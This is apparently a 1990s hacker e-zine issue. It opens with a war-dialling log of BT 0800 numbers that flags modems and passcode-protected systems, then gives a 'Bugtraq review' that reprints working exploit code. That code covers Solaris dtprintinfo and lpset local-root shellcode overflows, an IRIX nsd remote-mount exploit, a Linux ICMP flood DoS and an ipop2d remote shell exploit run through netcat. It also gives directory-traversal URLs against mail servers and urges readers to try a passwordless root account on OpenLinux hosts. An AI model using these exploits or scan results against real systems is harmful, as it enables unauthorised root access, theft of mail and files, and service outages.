[dead] 0800 672 646 [dead] 0800 672 647 [dead] 0800 672 648 [dead] 0800 672 649 [dead] 0800 672 650 [re-routed, BT somthing, stupid bitch is to quiet, ans-phone] 0800 672 651 [re-routed, Corpertate line service center, answerphone] 0800 672 652 [no answer] 0800 672 653 [BT customer service center, recording] 0800 672 654 [BT local goverment] 0800 672 655 [no answer] 0800 672 656 [no answer] 0800 672 657 [no answer] 0800 672 658 [BT local government] 0800 672 659 [no answer] 0800 672 660 [telecoms sales desk recording] 0800 672 661 ["] 0800 672 662 ["] 0800 672 663 ["] 0800 672 664 ["] 0800 672 665 ["] 0800 672 666 ["] 0800 672 667 ["] 0800 672 668 ["] 0800 672 669 ["] 0800 672 670 [no answer] 0800 672 671 [very strange, emits a tone, responds to DTMFs] 0800 672 672 [no answer] 0800 672 673 [dead] 0800 672 674 [dead] 0800 672 675 [modem/fax] 0800 672 676 [no answer] 0800 672 677 [no answer] 0800 672 678 [not recognised] 0800 672 679 [modem/fax] 0800 672 680 [dead] 0800 672 681 [BT number information line, * 2 digit passcode..] 0800 672 682 [dead] 0800 672 683 [no answer] 0800 672 684 [no answer] 0800 672 685 [busy] 0800 672 686 [no answer] 0800 672 687 [no answer] 0800 672 688 [not recognised] 0800 672 689 [no answer] 0800 672 690 [dead] 0800 672 691 [BT number information unit] 0800 672 692 [dead] 0800 672 693 [no answer] 0800 672 694 [no answer] 0800 672 695 [no answer] 0800 672 696 [no answer] 0800 672 697 [no answer] 0800 672 698 [no answer] 0800 672 699 [dead] 0800 672 700 [modem/fax] 0800 672 701 [re-routed, ans phone, * 3 digit sec code] 0800 672 702 [dead] 0800 672 703 [dead] 0800 672 704 [dead] 0800 672 705 [no answer] 0800 672 706 [dead] 0800 672 707 [Cellnet callback mesaging service] 0800 672 708 ["] 0800 672 709 [no answer] 0800 672 710 [no answer] 0800 672 711 ["hi, Birmingham"] 0800 672 712 [BT network services] 0800 672 713 [not rec] 0800 672 714 [not rec] 0800 672 715 [CIST] 0800 672 716 [not rec] 0800 672 717 [modem] 0800 672 718 [not rec] 0800 672 719 [no answer] 0800 672 720 [no answer] 0800 672 721 [dead] 0800 672 722 [no answer] 0800 672 723 [somthing managment center] 0800 672 724 [no answer] 0800 672 725 [dead] 0800 672 726 [not rec] ************************************************************************ 0800 672 727 [BT payphone automatic fault reporting system. For BT engineer dudes to request maintanance etc on payphones, requires 2 digit code (11) also fault code (10) etc] ************************************************************************ 0800 672 728 [no answer] 0800 672 729 [BT buisness connections] 0800 672 730 [Telecom red sales desk] 0800 672 731 ["] 0800 672 732 ["] 0800 672 733 ["] 0800 672 734 ["] 0800 672 735 ["] 0800 672 736 ["] 0800 672 737 ["] 0800 672 738 ["] 0800 672 739 ["] 0800 672 740 [no answer] 0800 672 741 [not rec] 0800 672 742 [dead] 0800 672 743 [no answer] 0800 672 744 [no answer] 0800 672 745 [no answer] 0800 672 746 [no answer] 0800 672 747 [no answer] 0800 672 748 [no answer] 0800 672 749 [no answer] 0800 672 750 [no answer] 0800 672 751 [dead] 0800 672 752 [answerphone] 0800 672 753 [dead] 0800 672 754 [production control team] 0800 672 755 [dead] 0800 672 756 [modem/fax] 0800 672 757 [dead] 0800 672 758 [not rec] 0800 672 759 [no answer] 0800 672 760 [dead] 0800 672 761 [BT residential repair service] 0800 672 762 [performance somthing] 0800 672 763 [dead] 0800 672 764 [dead] 0800 672 765 [dead] 0800 672 766 [dead] 0800 672 767 [dead] 0800 672 768 [dead] 0800 672 769 [dead] 0800 672 770 [BT buisness center] 0800 672 771 [no answer] 0800 672 772 [Cellnet direct] 0800 672 773 [0800 550 811 - changed] 0800 672 774 [modem/fax] 0800 672 775 [dead] 0800 672 776 [no answer] 0800 672 777 [HR and DS] 0800 672 778 [BT residential repair service] 0800 672 779 [direct to some womans Meridian Mail vmb. *81] 0800 672 780 [no answer] ************************************************************************ 0800 672 781 [HR and DS - !WARNING! - this is strange, on both these numbers it is not possible to terminate your call. Somhow the line is held open] ************************************************************************ 0800 672 782 [not rec] 0800 672 783 [no answer] 0800 672 784 [no answer] 0800 672 785 [no answer] 0800 672 786 [no answer] 0800 672 787 [no answer] 0800 672 788 [no answer] 0800 672 789 [no answer] 0800 672 790 [BT residential customer accounts service] 0800 672 791 [answerphone] 0800 672 792 [answerphone] 0800 672 793 [no answer] 0800 672 794 [no answer] 0800 672 795 [answerphone] 0800 672 796 [no answer] 0800 672 797 [no answer] 0800 672 798 [BT fax service. Meridian switch] 0800 672 799 [BT fax sercvie] 0800 672 800 [busy] 0800 672 801 [dead] 0800 672 802 [dead] 0800 672 803 [dead] 0800 672 804 [dead] 0800 672 805 [dead] 0800 672 806 [dead] 0800 672 807 [dead] 0800 672 808 [dead] 0800 672 809 [dead] 0800 672 810 [southapton buisness center] 0800 672 811 [BT corperate clients] 0800 672 812 [horsham center] 0800 672 813 [no answer] 0800 672 814 [no answer] 0800 672 815 [horsham buisness center] 0800 672 816 [no answer] 0800 672 817 [horsham center] 0800 672 818 [no answer] 0800 672 819 [no answer] 0800 672 820 [no answer] 0800 672 821 [no answer] 0800 672 822 [horsham center] 0800 672 823 [no answer] 0800 672 824 [no answer] 0800 672 825 [BT service center] 0800 672 826 [BT buisness center] 0800 672 827 [carrier] 0800 672 828 [not recognised] 0800 672 829 [no answer] 0800 672 830 [BT residential repair service] 0800 672 831 [dead] 0800 672 832 [dead] 0800 672 833 [dead] 0800 672 834 [dead] 0800 672 835 [no answer] 0800 672 836 [no answer] 0800 672 837 [no answer] 0800 672 838 [hello] 0800 672 839 [no answer] 0800 672 840 [6777 robert speaking] 0800 672 841 [no answer] 0800 672 842 [network managemnt center] 0800 672 843 [no answer] 0800 672 844 [dead] 0800 672 845 [BT voice-messaging] 0800 672 846 [BT voice-messaging] 0800 672 847 [no answer] 0800 672 848 [no answer] 0800 672 849 [no answer] 0800 672 850 [can i have the number you are reporting please?] 0800 672 851 [dead] 0800 672 852 [dead] 0800 672 853 [dead] 0800 672 854 [dead] 0800 672 855 [no answer] 0800 672 856 [nothing, then dead] 0800 672 857 [modem] 0800 672 858 [dead] 0800 672 859 [dead] 0800 672 860 [dead] 0800 672 861 [strange, internal dead tone] 0800 672 862 [not available] 0800 672 863 [hallo] 0800 672 864 [no answer] 0800 672 865 [modem] 0800 672 866 [no answer] 0800 672 867 [dead] 0800 672 868 [dead] 0800 672 869 [no answer] 0800 672 870 [telecom red sales desk] 0800 672 871 ["] 0800 672 872 ["] 0800 672 873 ["] 0800 672 874 ["] 0800 672 875 ["] 0800 672 876 ["] 0800 672 877 ["] 0800 672 878 ["] 0800 672 879 ["] 0800 672 880 [dead] 0800 672 881 [somthing buisness center] 0800 672 882 ["] 0800 672 883 ["] 0800 672 884 ["] 0800 672 885 [dead] 0800 672 886 [?] 0800 672 887 [modem] 0800 672 888 [dead] 0800 672 889 [dead] 0800 672 890 [dead] 0800 672 891 [no answer] 0800 672 892 [answerphone] 0800 672 893 [BT fax - BT-3] 0800 672 894 [answerphone] 0800 672 895 [answerphone] 0800 672 896 [answerphone] 0800 672 897 [BT fax service center] 0800 672 898 [This system will connect you to a BT office of your choice] 0800 672 899 [modem] 0800 672 900 [telecom red] 0800 672 901 ["] 0800 672 902 ["] 0800 672 903 ["] 0800 672 904 ["] 0800 672 905 ["] 0800 672 906 ["] 0800 672 907 ["] 0800 672 908 ["] 0800 672 909 ["] 0800 672 910 [business solutions] 0800 672 911 [no answer] 0800 672 912 [no answer] 0800 672 913 [no answer] 0800 672 914 [no answer] 0800 672 915 [no answer] 0800 672 916 [no answer] 0800 672 917 [no answer] 0800 672 918 [no answer] 0800 672 919 [no answer] 0800 672 920 [no answer] 0800 672 921 [query line] 0800 672 922 [no answer] 0800 672 923 [no answer] 0800 672 924 [no answer] 0800 672 925 [no answer] 0800 672 926 [no answer] 0800 672 927 [no answer] 0800 672 928 [no answer] 0800 672 929 [no answer] 0800 672 930 [dead] 0800 672 931 [no answer] 0800 672 932 [dead] 0800 672 933 [not recoginised] 0800 672 934 [hello, it's john] 0800 672 935 [no answer] 0800 672 936 [no answer] 0800 672 937 [southampton business center] 0800 672 938 [no answer] 0800 672 939 [no answer] 0800 672 940 [dead] 0800 672 941 [dead] 0800 672 942 [dead] 0800 672 943 [dead] 0800 672 944 [dead] 0800 672 945 [dead] 0800 672 946 [dead] 0800 672 947 [dead] 0800 672 948 [dead] 0800 672 949 [dead] 0800 672 950 [dead] 0800 672 951 [modem] 0800 672 952 [no answer] 0800 672 953 [modem] 0800 672 954 [no answer] 0800 672 955 [modem] 0800 672 956 [no answer] 0800 672 957 [modem] 0800 672 958 [no answer] 0800 672 959 [no answer] 0800 672 960 [no answer] 0800 672 961 [BT work manager center] 0800 672 962 [no answer] 0800 672 963 [BT workmanager center] 0800 672 964 [no answer] 0800 672 965 [BT workmanager center] 0800 672 966 ["] 0800 672 967 [no answer] 0800 672 968 [no answer] 0800 672 969 [no answer] 0800 672 970 [dead] 0800 672 971 [no answer] 0800 672 972 [no answer] 0800 672 973 [no answer] 0800 672 974 [no answer] 0800 672 975 [no answer] 0800 672 976 [no answer] 0800 672 977 [no answer] 0800 672 978 [no answer] 0800 672 979 [no answer] 0800 672 980 [no answer] 0800 672 981 [no answer] 0800 672 982 [no answer] 0800 672 983 [no answer] 0800 672 984 [dead] 0800 672 985 [Meridian mail] 0800 672 986 [no answer] 0800 672 987 [no answer] 0800 672 988 [no answer] 0800 672 989 [dead] 0800 672 990 [no answer] 0800 672 991 [modem] 0800 672 992 [dead] 0800 672 993 [not recognised] 0800 672 994 [no answer] 0800 672 995 [no answer] 0800 672 996 [no answer] 0800 672 997 [no answer] 0800 672 998 [no answer] 0800 672 999 [no answer] ********** -->[OO]:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: -->]OO[:[ SUIDcyde ]:::::::::::::[OO--[ by bodie ]---[ bodi3@usa.net ]::::::: -->[OO]:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: Bugtraq review --------- *NOTE* all these bugs have not been varified by me, use them at your own risk --------- been an interesting time recently on bugtraq. A was found in IE4 which means that if someone tries to bookmark your site, they will not be able to access their browser any more The bug works because IE5 tries to download a file called favicon.ico from the a web site when a user bookmarks it. It uses this icon to display next to the site in the faverites list. The bug works when the file isn't of the correct format, IE5 crashes :) This means you can stop all those script kiddies from bookmarking your site by putting a file called favicon.ico (just open up a t-file and write hello or something) This will encourage some people to use netscape and generally piss off microshaft. And the best part is, it's totally legal :) --- Another bug that was revealed was in the installation program for openlinux 2.2. The problem lies in that, when it installs it inserts a user in the password file called 'help'. This account is meant to be used to rescue the system if it crashes during installation. Why they don't just use root i don't know, but the account stays there after installation with root privs and no password. So if ya see any OL systems around try that out. I've seen 1 so far and it worked like a dream (of course i notified the sysadmin of it straight away :)) --- Yet more buffer overflows, this one for dtprintinfo, root. This exploit code works on Intel edition of Solaris2.6 and Solaris 2.7, you may have to fiddle with the code to get it working on other versions. To get it working you will have to type this first /*======================================================================== ex_dtprintinfo.c Overflow Exploits( for Intel x86 Edition) The Shadow Penguin Security (http://base.oc.to:/skyscraper/byte/551) Written by UNYUN (unewn4th@usa.net) ======================================================================== */ static char x[1000]; #define ADJUST 0 #define STARTADR 621 #define BUFSIZE 900 #define NOP 0x90 unsigned long ret_adr; int i; char exploit_code[] = "\xeb\x18\x5e\x33\xc0\x33\xdb\xb3\x08\x2b\xf3\x88\x06\x50\x50\xb0" "\x8d\x9a\xff\xff\xff\xff\x07\xee\xeb\x05\xe8\xe3\xff\xff\xff" "\xeb\x18\x5e\x33\xc0\x33\xdb\xb3\x08\x2b\xf3\x88\x06\x50\x50\xb0" "\x17\x9a\xff\xff\xff\xff\x07\xee\xeb\x05\xe8\xe3\xff\xff\xff" "\x55\x8b\xec\x83\xec\x08\xeb\x50\x33\xc0\xb0\x3b\xeb\x16\xc3\x33" "\xc0\x40\xeb\x10\xc3\x5e\x33\xdb\x89\x5e\x01\xc6\x46\x05\x07\x88" "\x7e\x06\xeb\x05\xe8\xec\xff\xff\xff\x9a\xff\xff\xff\xff\x0f\x0f" "\xc3\x5e\x33\xc0\x89\x76\x08\x88\x46\x07\x89\x46\x0c\x50\x8d\x46" "\x08\x50\x8b\x46\x08\x50\xe8\xbd\xff\xff\xff\x83\xc4\x0c\x6a\x01" "\xe8\xba\xff\xff\xff\x83\xc4\x04\xe8\xd4\xff\xff\xff/bin/sh"; unsigned long get_sp(void) { __asm__(" movl %esp,%eax "); } main() { putenv("LANG="); for (i=0;i> 8 ) &0xff; x[i+2]=(ret_adr >> 16 ) &0xff; x[i+3]=(ret_adr >> 24 ) &0xff; } x[BUFSIZE]=0; execl("/usr/dt/bin/dtprintinfo", "dtprintinfo", "-p",x,(char *) 0); } --- another exploit is in the lpset command. This goes sorta like this /*=================================================================== ex_lpset.c Overflow Exploits( for Intel Edition ) The Shadow Penguin Security (http://base.oc.to:/skyscraper/byte/551) Written by UNYUN (unewn4th@usa.net) ===================================================================== */ #define OFFSET 0x3b88 #define STARTADR 700 #define ENDADR 1200 #define EX_STADR 8000 #define BUFSIZE 22000 #define NOP 0x90 unsigned long ret_adr; int i,adjust; char exploit_code[] = "\xeb\x18\x5e\x33\xc0\x33\xdb\xb3\x08\x2b\xf3\x88\x06\x50\x50\xb0" "\x17\x9a\xff\xff\xff\xff\x07\xee\xeb\x05\xe8\xe3\xff\xff\xff\x55" "\x8b\xec\x83\xec\x08\xeb\x50\x33\xc0\xb0\x3b\xeb\x16\xc3\x33\xc0" "\x40\xeb\x10\xc3\x5e\x33\xdb\x89\x5e\x01\xc6\x46\x05\x07\x88\x7e" "\x06\xeb\x05\xe8\xec\xff\xff\xff\x9a\xff\xff\xff\xff\x0f\x0f\xc3" "\x5e\x33\xc0\x89\x76\x08\x88\x46\x07\x89\x46\x0c\x50\x8d\x46\x08" "\x50\x8b\x46\x08\x50\xe8\xbd\xff\xff\xff\x83\xc4\x0c\x6a\x01\xe8" "\xba\xff\xff\xff\x83\xc4\x04\xe8\xd4\xff\xff\xff/bin/sh"; unsigned long get_sp(void) { __asm__(" movl %esp,%eax "); } static char x[BUFSIZE]; main(int argc, char **argv) { memset(x,NOP,18000); ret_adr=get_sp()-OFFSET; printf("0 : x86 Solaris2.6 J\n1 : ?\n2 : ?\n3 : x86 Solaris 7 J\n"); printf("Input (0-3) : "); scanf("%d",&adjust); printf("Jumping Address = 0x%lx\n",ret_adr); for (i = adjust+STARTADR; i> 8 ) &0xff; x[i+0]=(ret_adr >> 16 ) &0xff; x[i+1]=(ret_adr >> 24 ) &0xff; } for (i=0;i> 8 ) &0xff; x[i+1]=(ret_adr >> 16 ) &0xff; x[i+0]=(ret_adr >> 24 ) &0xff; } memcpy(x,EV,strlen(EV)); x[3000]=0; putenv(x); execl("/bin/passwd","passwd",(char *)0); } --- A lot of mail servers are now implementing web interfaces. This can be a problem whe usuffer holes like this. The following programs have these problems: CTMail: type: http://[server]:8002/../spool/username/mail.txt into your web browser and you can view the mail of the user FTGate: same as above except this seems to be a bit more reliable than the CTMail bug NTMail: This is even worse, it allows you to view any file on the system. Type: http://[server]:8000/../../../../../boot.ini. and your looking at boot.ini I'm sure u'll find nice ways of exploiting these bugs --- Yet more problems with IRIX comes in the nsd virtual file system. This allows local users to exploit root. Code coming: (sorry about the extended coments but i decided to include out of respect to the authour) /****************************************************************************** IRIX 6.5 nsd virtual filesystem exploit Author: Jefferson Ogata (JO317) Please note that this program comes with NO WARRANTY WHATSOEVER. Your use of this program constitutes your complete acceptance of all liability for any damage or loss caused by the aforesaid use. It is provided to the network community solely to document the existence of a vulnerability in the security implementations of certain versions of IRIX, and may not be used for any illicit purpose. Many of the details of the bug this program exploits have been available to users of SGI's online support system since February 1999. The current revision of IRIX (6.5.3) corrects this bug, at least enough to stop this particular exploit, and I strongly encourage you to bring your systems up to date as quickly as possible. With IRIX 6.5, SGI has moved all name services, NIS services, and DNS lookups into a userland process called nsd, which exports the results of the queries it fields into a virtual filesystem. The virtual filesystem is normally mounted onto the directory /ns by the program /sbin/nsmount, which is invoked by nsd on startup. The nsd daemon itself is exporting the filesystem via NFS3 over a dynamically bound UDP port -- rather than a well-known or settable one -- typically in the 1024-1029 range. On a desktop system, 1024 is a good bet, since nsd is usually the first RPC/UDP service to be started. The NFS filesystem is not registered with mountd, so there is no way to query mountd for a mount filehandle. But because the NFS port is fairly easy to discover through port scanning, and because the mount filehandle nsd uses is simply a string of 32 zeroes, it is trivial to mount the nsd filesystem from a host anywhere on the Internet. nsd will serve an array of NFS requests to anyone. Furthermore, because the service's NFS port is bound dynamically, it is difficult to protect it with a firewall; it may change from one system start to another, or if the daemon is killed and restarted. This program can successfully mount the nsd-exported virtual filesystem from a remote host onto a machine running IRIX 6.4 or higher. It makes use of the MS_DOXATTR mount flag defined in IRIX 6.4 and higher. I do not know what this flag does at the NFS protocol level, but it allows the client to ask the NFS server not to enforce certain permissions controls against the client. I don't know whether any other vendor NFS client systems support this flag. A clever person might write a userland NFS client that would accept an initial handle, NFS port, etc. as arguments. On an SGI with SGI C compiler, compile with: cc -o nsdadv nsdadv.c Run it this way: nsdadv /mnt sucker.example.com 1024 with obvious substitutions. So what are the security implications of this? Well, at the very least, the nsd filesystem on an NIS server reveals the NIS domain name, and what maps it contains, as well as what classes are being used. By exploring the filesystem shortly after it has been mounted I have been able to retrieve data that should be hidden from me, including shadow password entries from a remote system's shadow file. Beyond retrieving keys and maps, you can also monitor the filesystem for changes. A great deal of information is leaked through the contents of the nsd filesystem. For example, if host A looks up a host B's IP address, a file named B will appear in the /.local/hosts.byname directory in A's nsd filesystem. The file's contents will be the IP address. By the way, though you be unable to chdir into a particular location in the nsd filesystem, you may yet succeed under slightly different conditions. Eventually you can do it. I'm not sure why or when, but nsd gets picky sometimes. Eventually it relents. Specifically, I've found that the entire nsd filesystem appears readable for a few seconds after it is initially mounted. If you can't look at something, unmount the filesystem, remount it, and try again immediately. It also seems that a stat() is sometimes required before a chdir(). Your mileage may vary, but keep trying. You may wish to write a script to mount the nsd filesystem, explore and take inventory of its contents, and unmount the filesystem quickly. Once you've chdir'd into a directory, it appears you can always read it, although you can't necessarily stat its contents. This suggests a strategy of spawning a group of processes each with its cwd set to a subdirectory of the nsd filesystem, in order to retain visibility on the entire filesystem. Each process would generate an inventory of its cwd, and then monitor it for changes. A Perl script could do this well. Another thing: it is possible to create an empty file in nsd's exported filesystem simply by stat()ing a nonexistent filename. This suggests a potential DoS by creating many files in a directory. Remember that the system keeps a local cache in /var/ns, so you may have to wait for cached entries on the target host to expire before you'll see them reappear in the virtual filesystem. For some fairly extensive info on the nsd implementation, take a look at: http://www.bitmover.com/lm/lamed_arch.html ****** What got me into all this was that I found I could no longer run services chrooted if they required DNS. It took considerable effort to come up with a solution to this. This was a fundamental change from IRIX 6.4, and I know I'm not the only one who finds the nsd implementation to be a generally unpleasant direction, in part because it causes umount -t nfs to break system database services. I give SGI points for creativity -- in one sense, using NFS as a database access system is a very slick approach. But the database needs a security model, and the model needs to be implemented correctly. Neither of these needs appears to have been met. So how could SGI fix this? Without going back, SGI could at least make nsd respond only to queries from localhost (see note below about IRIX 6.5.3). The problem here is that they actually intend to support remote mounts in later releases, in order to supplement or supplant other means of distribution. The web documents indicate this. They could create a well-randomized mount filehandle for the filesystem and pass that to nsmount. Then you couldn't remotely mount the filesystem without guessing the handle -- nontrivial with a 32-byte handle. At the very least, they should provide libraries of regular BIND resolver routines, file-based getpwent, etc. routines, so one could choose the resolution strategy at link time, perhaps by modifying the shared library path. ****** With IRIX release 6.5.3, SGI appears to have fixed this problem, at least to some degree. The exploit does not appear to work as it does against 6.5.2. Further testing is needed, and the behavior should be watched carefully in future versions of IRIX. ****************************************************************************/ #include #include #include #include #include #include #include #include #include #include #include #include #include #include /* Filesystem type name for nsd-exported filesystem. */ #define NSD_FSTYPE "nfs3" /* File the records mounted filesystems. */ #define MTAB_FILE "/etc/mtab" /* Socket address we'll fill in with our destination IP and port. */ struct sockaddr_in sin; /* All zero file handle. This appears to be the base handle for the nsd filesystem. Great security, huh? */ unsigned char fh[NFS_FHSIZE] = { 0 }; /* NFS mount options structure to pass to mount(2). The meanings of these are documented to some extent in /usr/include/sys/fs/nfs_clnt.h. The flags field indicates that this is a soft mount without log messages, and to set the initial timeout and number of retries from fields in this structure. The fh field is a pointer to the filehandle of the mount point, whose size is set by fh_len. As noted above, the mount point filehandle is just 32 zeroes. */ struct nfs_args nx = { &sin, /* addr */ (fhandle_t *) fh, /* fh */ NFSMNT_SOFT|NFSMNT_TIMEO|NFSMNT_RETRANS|NFSMNT_NOAC, /* flags */ 0, /* wsize */ 0, /* rsize */ 100, /* timeo */ 2, /* retrans */ 0, /* hostname */ 0, /* acregmin */ 0, /* acregmax */ 0, /* acdirmin */ 0, /* acdirmax */ 0, /* symttl */ { 0 }, /* base */ 0, /* namemax */ NFS_FHSIZE, /* fh_len */ /* On IRIX 6.4 and up there are also the following... */ /* bdsauto */ /* bdswindow */ /* On IRIX 6.5 there are also the following... */ /* bdsbuflen */ /* pid */ /* maxthreads */ }; void usage (void) { fprintf (stderr, "usage: nsmount_remote directory host port\n\n"); fprintf (stderr, "NFS-mounts the virtual filesystem exported by nsd on via NSD daemon\n"); fprintf (stderr, "port onto .\n\n"); exit (1); } int main (int argc, char **argv) { char *dir; char *host; char *ports; int port; struct hostent *h; int fstype; FILE *mtabf; struct mntent mnt = { 0, 0, NSD_FSTYPE, "soft,timeo=100,retrans=2", 0, 0, }; if (argc != 4) usage (); dir = argv[1]; host = argv[2]; port = atoi ((ports = argv[3])); /* Prepare for host lookup. */ memset ((void *) &sin, 0, sizeof (sin)); sin.sin_family = 2; sin.sin_port = port; /* Look up the host. */ if (inet_aton (host, &sin.sin_addr)) ; else if ((h = gethostbyname (host))) { unsigned long *l = (unsigned long *) *(h->h_addr_list); sin.sin_addr.s_addr = l[0]; } else { fprintf (stderr, "Cannot resolve host %s.\n", host); return 1; } /* Get filesystem type index for nsd filesystem type. */ if ((fstype = sysfs (GETFSIND, NSD_FSTYPE)) < 0) { perror ("sysfs (" NSD_FSTYPE ")"); return 1; } fprintf (stderr, "Mounting nsd " NSD_FSTYPE " fs from %s(%s):%d onto %s\n", host, inet_ntoa (sin.sin_addr), port, dir); /* These flags are documented in /usr/include/sys/mount.h. MS_DOXATTR means "tell server to trust us with attributes" and MS_DATA means "6-argument mount". MS_DOXATTR is a mount option in IRIX 6.4 and up. The attack doesn't seem to work without this option. So even though this program will compile on IRIX 6.2, you need to use an IRIX 6.4 or higher OS to attack nsd. */ if (mount (dir, dir, MS_DOXATTR|MS_DATA, (char *) fstype, &nx, sizeof (nx)) != 0) { perror ("mount"); return 1; } /* Record mount point in /etc/mtab. */ mnt.mnt_fsname = malloc (strlen (host) + sizeof (":nsd@") + strlen (ports) + 1); sprintf (mnt.mnt_fsname, "%s:nsd@%s", host, ports); mnt.mnt_dir = dir; if (!(mtabf = setmntent (MTAB_FILE, "r+"))) { perror ("setmntent"); return 1; } if (addmntent (mtabf, &mnt) < 0) { perror ("addmntent"); return 1; } if (endmntent (mtabf) < 0) { perror ("endmntent"); return 1; } return 0; } --- Microshaft are not having a good time (do they ever?). Another bug in IE5 was discovered. Put the following code into your web page to freeze IE and stop script kiddies viewing your web site -----cut here----- -----cut here----- This will put the background colour in an infinite loop and freeze IE --- Linux kernel 2.2.x seems to get into an awful mess when it is sent a large number of some types of ICMP packages. To exploit this bug, use this: #include #include #include #include #include #include #include #include #include #include #include #include struct icmp_hdr { struct iphdr iph; struct icmp icp; char text[1002]; } icmph; int in_cksum(int *ptr, int nbytes) { long sum; u_short oddbyte, answer; sum = 0; while (nbytes > 1) { sum += *ptr++; nbytes -= 2; } if (nbytes == 1) { oddbyte = 0; *((u_char *)&oddbyte) = *(u_char *)ptr; sum += oddbyte; } sum = (sum >> 16) + (sum & 0xffff); sum += (sum >> 16); answer = ~sum; return(answer); } struct sockaddr_in sock_open(char *address, int socket, int prt) { struct hostent *host; if ((host = gethostbyname(address)) == NULL) { perror("Unable to get host name"); exit(-1); } struct sockaddr_in sin; bzero((char *)&sin, sizeof(sin)); sin.sin_family = PF_INET; sin.sin_port = htons(prt); bcopy(host->h_addr, (char *)&sin.sin_addr, host->h_length); return(sin); } void main(int argc, char **argv) { int sock, i, ctr, k; int on = 1; struct sockaddr_in addrs; if (argc < 3) { printf("Usage: %s \n", argv[0]); exit(-1); } for (i = 0; i < 1002; i++) { icmph.text[i] = random() % 255; } sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW); if (setsockopt(sock, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on)) == -1) { perror("Can't set IP_HDRINCL option on socket"); } if (sock < 0) { exit(-1); } fflush(stdout); for (ctr = 0;ctr < 1001;ctr++) { ctr = ctr % 1000; addrs = sock_open(argv[1], sock, atoi(argv[2])); icmph.iph.version = 4; icmph.iph.ihl = 6; icmph.iph.tot_len = 1024; icmph.iph.id = htons(0x001); icmph.iph.ttl = 255; icmph.iph.protocol = IPPROTO_ICMP; icmph.iph.saddr = ((random() % 255) * 255 * 255 * 255) + ((random() % 255) * 65535) + ((random() % 255) * 255) + (random() % 255); icmph.iph.daddr = addrs.sin_addr.s_addr; icmph.iph.frag_off = htons(0); icmph.icp.icmp_type = random() % 14; icmph.icp.icmp_code = random() % 10; icmph.icp.icmp_cksum = 0; icmph.icp.icmp_id = 2650; icmph.icp.icmp_seq = random() % 255; icmph.icp.icmp_cksum = in_cksum((int *)&icmph.icp, 1024); if (sendto(sock, &icmph, 1024, 0, (struct sockaddr *)&addrs, sizeof(struct sockaddr)) == -1) { if (errno != ENOBUFS) printf("X"); } if (ctr == 0) printf("b00m "); fflush(stdout); } close(sock); } --- Another one of those rare jewls came out earlier this month: a remote root exploit. This time in ipop2d. use well: ---- SDI-pop2.c ------------------ /* * Sekure SDI (Brazilian Information Security Team) * ipop2d remote exploit for linux (Jun, 02 1999) * * by c0nd0r * * (read the instructions below) * * Thanks to jamez, bahamas, dumped, bishop, slide, paranoia, stderr, * falcon, vader, c_orb, marty(nordo!) and minha malinha! * also to #uground (irc.brasnet.org) and #SDI (efnet), * guys at el8.org, toxyn.org, pulhas.org * * Sincere Apologizes: duke (for the mistake we made with the wu-expl), * your code rocks. * * Usage: * * SDI-pop2 [offset] * * where imap_server = IMAP server at your box (or other place as well) * user = any account at your box * pass = the account's password * offset = 0 is default -- increase if it's necessary. * * Example: (netcat rocks) * * (./SDI-pop ppp-666.lame.org rewt lame 0; cat) | nc lame.org 109 * * ---------------------------------------------------------------- * HOWTO-exploit: * * In order to gain remote access as user nobody, you should set * an IMAP server at your box (just edit the inetd.conf) or at * any other machine which you have an account. * * During the anonymous_login() function, the ipop2d will set the * uid to user nobody, so you are not going to get a rootshell. * ---------------------------------------------------------------- * * We do NOT take any responsability for the consequences of using * this code -- you've been warned! don't be a script k1dd13! * */ #include /* * (shellcode) * * jmp 0x1f * popl %esi * movl %esi,0x8(%esi) * xorl %eax,%eax * movb %eax,0x7(%esi) * movl %eax,0xc(%esi) * movb $0xb,%al * movl %esi,%ebx * leal 0x8(%esi),%ecx * leal 0xc(%esi),%edx * int $0x80 * xorl %ebx,%ebx * movl %ebx,%eax * inc %eax * int $0x80 * call -0x24 * .string \"/bin/sh\" * grab your shellcode generator at www.sekure.org */ char c0d3[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89" "\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c" "\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff" "\xff\xff/bin/sh"; main (int argc, char *argv[] ) { char buf[2500]; int x,y=1000, offset=0; long addr; char host[255], user[255], pass[255]; int bsize=986; if ( argc < 4) { printf ( "Sekure SDI ipop2d remote exploit - Jun, 02 1999\n"); printf ( "usage: (SDI-pop2 [offset];cat) | nc lame.org 109\n"); exit (0); } snprintf ( host, sizeof(host), "%s", argv[1]); snprintf ( user, sizeof(user), "%s", argv[2]); snprintf ( pass, sizeof(pass), "%s", argv[3]); if ( argc > 4) offset = atoi ( argv[4]); /* gimme the ret + offset */ addr = 0xbffff3c0 + offset; fprintf ( stderr, "0wning data since 0x%x\n\n", addr); /* calculation of the return address position */ bsize -= strlen ( host); for ( x = 0; x < bsize-strlen(c0d3); x++) buf[x] = 0x90; for ( y = 0; y < strlen(c0d3); x++, y++) buf[x] = c0d3[y]; for ( ; x < 1012; x+=4) { buf[x ] = addr & 0x000000ff; buf[x+1] = (addr & 0x0000ff00) >> 8; buf[x+2] = (addr & 0x00ff0000) >> 16; buf[x+3] = (addr & 0xff000000) >> 24; } sleep (1); printf ( "HELO %s:%s %s\r\n", host, user, pass); sleep (1); printf ( "FOLD %s\r\n", buf); } ----- EOF --------------------- --- More problems in windoze9x, nt and all other versions at the moment, comes in the handling of files named prn.* Because in old versions of DOS, this was reserved as a way of accessing the printer, it will not let you create any files named prn.* This is o.k, becuase windows won't let you create a file with that name in any aplication. The problem, as usual with microshaft products comes in the implementation of networking. If you are able to access a file on a remote computer you can rename it to prn, and it will be unremoveable. This will only work if you access the remote computer using //computer/drive/* it will not work if you map a network drive to your computer. This could be a nasty flaw if someone done something like this: (talking DOS now) rename //computer/c/program files //computer/c/prn this would mean that the owner of the computer could not access, rename or delete his program files directory and would probably lose all the data in the directory. The only solution so far for this problem seems to be by using postix (a unix emulator for windows) to remove the file. Unix to the rescue once again. --- A few weeks ago MIRC 5.6 was released. This contains a serious vulnerability in that if you mention a url in a window, mirc will automaticly tell your browser to go to that page, oh no, more people with banners and this time you can't stop it from opening up your web browser and telling it to access the site. --- Any of you code kiddies out there want to crash and NT workstation? A 